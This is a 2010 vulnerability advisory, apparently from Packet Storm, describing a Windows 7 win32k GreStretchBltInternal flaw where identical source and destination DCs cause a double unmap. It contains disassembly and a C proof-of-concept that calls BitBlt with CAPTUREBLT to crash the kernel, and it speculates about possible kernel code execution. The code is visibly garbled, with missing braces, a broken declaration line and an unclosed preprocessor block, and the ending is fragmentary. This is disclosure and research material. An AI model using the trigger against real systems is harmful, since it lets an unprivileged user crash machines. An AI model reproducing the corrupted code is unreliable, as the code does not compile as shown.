Microsoft Windows Microsoft Windows Does Not Handle src == dest

Type packetstorm
Reporter Tavis Ormandy
Modified 2010-08-17T00:00:00


                                            `Microsoft Windows win32k!GreStretchBltInternal() does not handle src == dest  
A bitblt (bit block transfer) is used to copy one rectangular region of screen  
to another, often performing a raster operation (rop) of some sort (e.g. and,  
or, xor). On Windows, bitblts are performed using the BitBlt() GDI32 api, which  
is passed a source and destination DC, along with the dimensions of the regions  
to transfer. BitBlt() is backed by the native system service, NtGdiBitBlt().  
On Windows 7, the following code from win32k!GreStretchBltInternal is guarded by  
a check for a rop including CAPTUREBLT (Include Layered Windows):  
.text:BF981F07 mov ecx, [ebp+dcoSrc] ; ecx is a pointer to src DCOBJ  
.text:BF981F0D test dword ptr [ecx+18h], 4000h ; probably checking if redirection bitmap selected?  
.text:BF981F14 jz short loc_BF981F24  
.text:BF981F16 push ebx  
.text:BF981F17 push ebx  
.text:BF981F18 call DC::pSurface(void)  
.text:BF981F1D mov ecx, eax  
.text:BF981F1F call SURFACE::bUnMap(void *,DC *)  
.text:BF981F24 loc_BF981F24:  
.text:BF981F24 mov ecx, [ebp+dcoTrg] ; ecx is a pointer to dst DCOBJ  
.text:BF981F2A test dword ptr [ecx+18h], 4000h  
.text:BF981F31 jz short loc_BF981F41  
.text:BF981F33 push ecx  
.text:BF981F34 push ebx  
.text:BF981F35 call DC::pSurface(void)  
.text:BF981F3A mov ecx, eax  
.text:BF981F3C call SURFACE::bUnMap(void *,DC *)  
You can see this code tests a flag, gets a pointer to a SURFACE object, then  
unmaps it. This code does not handle dcoSrc == dcoTrg, which causes bUnMap() to  
be called twice for the same SURFACE.  
This will cause a synchronization error, and result in a bugcheck due to the  
unhandled exception. It's possible that on MP machines a race condition could  
exist that would allow an attacker to continue past the initial error, possibly  
resulting in an exploitable condition (untested).  
Affected Software  
At least Microsoft Windows 7 is affected.  
An unprivileged user may be able to cause a bugcheck, or possibly execute  
arbitrary kernel code.  
Example code to trigger this vulnerability is available below.  
#ifndef WIN32_NO_STATUS  
# define WIN32_NO_STATUS // I prefer working with ntstatus.h  
#include <windows.h>  
#include <assert.h>  
#include <stdio.h>  
#include <winerror.h>  
#include <winternl.h>  
#include <stddef.h>  
#include <winnt.h>  
#ifdef WIN32_NO_STATUS  
# undef WIN32_NO_STATUS  
#include <ntstatus.h>  
#pragma comment(lib, "GDI32")  
#pragma comment(lib, "USER32")  
int main(int argc, char **argv)  
HWND Window;  
HDC Device; = CS_OWNDC;  
Class.lpfnWndProc = DefWindowProc;  
Class.cbClsExtra = 0;  
Class.cbWndExtra = 0;  
Class.hInstance = GetModuleHandle(NULL);  
Class.hIcon = NULL;  
Class.hCursor = NULL;  
Class.hbrBackground = NULL;  
Class.lpszMenuName = NULL;  
Class.lpszClassName = "Class";  
Window = CreateWindowEx(WS_EX_COMPOSITED, "Class", "Window", 0, 32, 32, 32, 32, NULL, NULL, NULL, NULL);  
Device = GetWindowDC(Window);  
BitBlt(Device, 32, 32, 32, 32, Device, 32, 32, CAPTUREBLT | SRCCOPY);  
return 0;  
This bug was discovered by Tavis Ormandy.  
And all the other elite people I've worked with (sorry, too many to generate!).  
This issue was reported in March.  
Redirection bitmap?  
BitBlt() Win32 api.